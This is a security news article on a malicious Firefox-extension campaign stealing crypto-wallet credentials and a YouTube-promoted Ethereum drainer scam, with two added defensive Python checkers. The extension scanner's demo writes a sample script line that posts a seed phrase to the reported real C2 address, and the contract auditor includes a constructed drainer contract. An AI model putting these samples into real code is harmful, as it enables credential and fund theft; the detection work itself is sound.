Threat Actors Use Malicious Firefox Extensions to Steal Over $1 Million in Crypto.

Bisma Farrukh

Researchers have uncovered a new malware campaign named GreedyBear. This campaign used over 150 malicious Firefox extensions to impersonate popular cryptocurrency wallets and steal more than $1 million in digital assets.
Koi Security researcher Tuval Admoni confirmed the fake extensions posed as MetaMask, TronLink, Exodus, Rabby Wallet, and other well-known wallet services.
Attackers used “Extension Hollowing” to bypass Mozilla’s extension review process. Instead of submitting malicious code upfront, they first uploaded harmless-looking extensions, collected fake positive reviews to appear credible, then updated the code to include credential-stealing functions once the extensions were approved.
These fake add-ons captured wallet credentials and sent them to an attacker-controlled server. The malware also logged victims’ IP addresses, likely for tracking.
This campaign appears to expand on an earlier operation called Foxy Wallet, which involved at least 40 similar malicious Firefox extensions. The volume of new add-ons suggests the operation has significantly scaled up.
Beyond browser extensions, the attackers distributed malicious executables via Russian sites offering cracked software. These files installed info stealers and ransomware.
The same group also set up fake cryptocurrency service websites, including phony wallet repair tools, to trick users into entering wallet credentials or payment data.
Koi Security linked all three attack methods to a single threat actor. All activity connected to the same command-and-control (C2) server at IP address 185.208.156[.]66.
Evidence shows the campaign is expanding to other browsers. Investigators found a malicious Chrome extension called “Filecoin Wallet” using the same C2 server and credential theft logic.
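The two tells described above (an update that quietly widens an add-on's permissions, and scripts that call home to the reported C2) can both be checked from a Firefox profile. The following is an added example, not Koi Security's tooling or anything from the report: it diffs the permissions of a reviewed manifest against its update, and searches each installed .xpi bundle (a zip file) for the C2 address 185.208.156.66 (written fanged so it matches what a script would contain). The two manifests, the extension built by `make_sample_xpi()` and the `SUSPICIOUS_PERMS` list are constructed for the demo and are assumptions, not indicators from the report.

```python
"""Added triage helper for the extension campaign described above (not Koi Security's code).

Two checks a defender can run against a Firefox profile:
  1. search each installed .xpi bundle for the C2 address the report attributes
     to the campaign (185.208.156[.]66, written fanged here so it matches scripts), and
  2. diff the permissions of the manifest that was reviewed against the manifest
     of the update, which is where an "Extension Hollowing" update shows itself.
The extension built by make_sample_xpi() and the two manifests are constructed for
this demo; the permission list in SUSPICIOUS_PERMS is a heuristic, not from the report.
"""
import json
import os
import tempfile
import zipfile

GREEDYBEAR_C2 = "185.208.156.66"

# Permissions that let an extension read every page or intercept traffic; an update
# that adds these to a previously harmless add-on deserves a look (heuristic list).
SUSPICIOUS_PERMS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*",
                    "webRequest", "webRequestBlocking", "cookies", "clipboardRead"}


def extension_permissions(manifest):
    """Collect every permission-like string from a WebExtension manifest (MV2 or MV3)."""
    perms = set()
    for key in ("permissions", "optional_permissions", "host_permissions"):
        perms.update(manifest.get(key, []))
    for script in manifest.get("content_scripts", []):
        perms.update(script.get("matches", []))
    return perms


def hollowing_delta(reviewed_manifest, updated_manifest):
    """Permissions the update added that the reviewed version never declared."""
    return extension_permissions(updated_manifest) - extension_permissions(reviewed_manifest)


def scan_xpi(xpi_path, ioc=GREEDYBEAR_C2):
    """Search every member of a Firefox .xpi (a zip) for the C2 address and report its permissions.

    A plain substring search: an address assembled at runtime from fragments is not caught.
    """
    hits, manifest = [], {}
    with zipfile.ZipFile(xpi_path) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            if name == "manifest.json":
                manifest = json.loads(data)
            if ioc.encode() in data:
                hits.append(name)
    perms = extension_permissions(manifest)
    return {"ioc_hits": hits, "permissions": perms,
            "suspicious": perms & SUSPICIOUS_PERMS}


def scan_extensions_dir(extensions_dir, ioc=GREEDYBEAR_C2):
    """Scan every .xpi in a profile's extensions/ directory; results keyed by file name."""
    return {entry: scan_xpi(os.path.join(extensions_dir, entry), ioc)
            for entry in sorted(os.listdir(extensions_dir)) if entry.endswith(".xpi")}


# Constructed manifests: the benign first upload and the hollowed-out update.
REVIEWED_V1 = {"manifest_version": 2, "name": "Wallet Helper", "version": "1.0",
               "permissions": ["storage"]}
HOLLOWED_V2 = {"manifest_version": 2, "name": "Wallet Helper", "version": "1.1",
               "permissions": ["storage", "<all_urls>", "webRequest"],
               "content_scripts": [{"matches": ["*://*/*"], "js": ["inject.js"]}]}


def make_sample_xpi(directory):
    """Write a constructed .xpi whose content script posts a captured seed phrase to the C2."""
    path = os.path.join(directory, "wallet-helper@example.xpi")  # hypothetical add-on id
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("manifest.json", json.dumps(HOLLOWED_V2))
        zf.writestr("inject.js",
                    f'fetch("http://{GREEDYBEAR_C2}/collect", '
                    '{method: "POST", body: JSON.stringify({seed: seedPhrase})});')
    return path


def demo():
    """Build the sample in a temp dir and run both checks; returns (added permissions, findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        make_sample_xpi(tmp)
        return hollowing_delta(REVIEWED_V1, HOLLOWED_V2), scan_extensions_dir(tmp)


if __name__ == "__main__":
    added, findings = demo()
    print("permissions added by the update:", sorted(added))
    for name, result in findings.items():
        print(name, "C2 hits:", result["ioc_hits"], "suspicious:", sorted(result["suspicious"]))
```

To run it against a real profile, point `scan_extensions_dir()` at the profile's `extensions/` folder; the reviewed-versus-updated diff needs the earlier manifest, which you will only have if you archived the add-on before it updated, so the substring and permission checks are the ones that work after the fact.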
Koi Security also found signs that attackers used AI tools to create some parts of the malware. This highlights how threat actors leverage AI to launch faster, large-scale operations.
“This group isn’t just using one tool,” Admoni said. “They’ve built a flexible malware delivery system that can shift tactics quickly. What began as a few malicious extensions is now a multi-platform campaign targeting both credentials and assets.”
New Ethereum Scam Disguises Wallet Drainers as Trading Bots
Meanwhile, SentinelOne exposed another active scam using Ethereum smart contracts disguised as trading bots to drain user wallets. Since early 2024, the campaign has stolen over $900,000.
The scammers promote these bots via YouTube videos. The videos walk users through deploying smart contracts in Remix, the browser-based Solidity IDE. Video descriptions link to external sites hosting the malicious contract code.
Researchers found the videos were AI-generated and posted from aged YouTube accounts. These accounts also share playlists of real cryptocurrency content to appear legitimate. Most comments on the videos are positive, likely because the scammers delete negative feedback.
One such YouTube account dates back to October 2022. Investigators believe the attackers either built their credibility over time or bought it from a marketplace that sells old accounts.
When victims deploy the malicious smart contract, they are instructed to send Ether to it. The contract then silently transfers the funds to a wallet controlled by the attackers.
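The scam works because victims paste and deploy source they never read. The check below is an added example, not SentinelOne's methodology and not taken from any contract in the campaign: it pulls every value-sending call out of a Solidity source (`.transfer`, `.send`, `.call{value:}`), resolves receivers such as `payable(x)` to `x`, and warns when the receiver is anything other than `msg.sender` or when a state variable is initialised with a hardcoded address. It is a text heuristic over source, so it says nothing about bytecode or about an address assembled at runtime; the two sample contracts are constructed.

```python
"""Added pre-deployment check for the "trading bot" contracts described above
(not SentinelOne's tooling, and not code from the campaign).

Extracts every ETH-sending call in a Solidity source, resolves payable(x) to x, and
warns when value leaves the contract for anyone other than msg.sender or when a
state variable carries a hardcoded address. Regex over source text; the sample
contracts below are constructed for the demo.
"""
import re

# receiver.transfer(...), receiver.send(...), receiver.call{value: ...}
SINK_RE = re.compile(
    r"(?P<recv>[\w.]+(?:\([^()]*\))?)\s*\.\s*"
    r"(?:(?P<kind>transfer|send)\s*\(|(?P<call>call)\s*\{\s*value)"
)
# address [visibility ...] name = 0x<40 hex chars>
HARDCODED_RE = re.compile(r"address\s+(?:\w+\s+)*(\w+)\s*=\s*(0x[0-9a-fA-F]{40})")
COMMENT_RE = re.compile(r"//[^\n]*|/\*.*?\*/", re.S)


def strip_comments(source):
    """Drop // and /* */ comments so a reassuring comment cannot hide a sink from the regexes."""
    return COMMENT_RE.sub("", source)


def transfer_sinks(source):
    """Return (receiver, kind) for every value-sending call, in source order."""
    sinks = []
    for m in SINK_RE.finditer(strip_comments(source)):
        recv = m.group("recv")
        inner = re.fullmatch(r"payable\((.*)\)", recv)
        if inner:
            recv = inner.group(1).strip()
        sinks.append((recv, m.group("kind") or m.group("call")))
    return sinks


def hardcoded_addresses(source):
    """Map state variables initialised with a literal address to that address."""
    return dict(HARDCODED_RE.findall(strip_comments(source)))


def audit_bot_contract(source):
    """Flag value flows that leave the contract for anyone other than the caller."""
    sinks = transfer_sinks(source)
    hardcoded = hardcoded_addresses(source)
    warnings = []
    for recv, kind in sinks:
        if recv == "msg.sender":
            continue
        target = f"{recv} (= {hardcoded[recv]})" if recv in hardcoded else recv
        warnings.append(f"{kind} sends contract balance to {target}, not to the caller")
    return {"sinks": sinks, "hardcoded": hardcoded, "warnings": warnings}


# Constructed sample in the shape of the lure: "starting the bot" forwards the deposit
# to a fixed address, while a withdraw() to msg.sender makes the victim feel in control.
DRAINER_SRC = """
pragma solidity ^0.8.0;
contract ArbitrageBot {
    address private _pool = 0x1111111111111111111111111111111111111111; // "liquidity pool"
    function start() external payable {
        payable(_pool).transfer(address(this).balance); // looks like funding a pool
    }
    function withdraw() external {
        payable(msg.sender).transfer(address(this).balance);
    }
}
"""

# Constructed control case: the only outflow goes back to the caller.
HONEST_SRC = """
contract Vault {
    function withdraw(uint256 amount) external {
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok);
    }
}
"""

if __name__ == "__main__":
    for name, src in (("ArbitrageBot", DRAINER_SRC), ("Vault", HONEST_SRC)):
        report = audit_bot_contract(src)
        print(name, "->", report["warnings"] or ["no unexpected outflows"])
```

Run it over the source a video description links to before pressing Deploy in Remix; a single warning naming an address that is not yours is reason enough to stop.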
“AI-generated content, combined with aged YouTube accounts, allows almost anyone to fake legitimacy,” SentinelOne’s Alex Delamotte said. “Scammers use these tools to trick victims into handing over their crypto under the illusion of a trading opportunity.”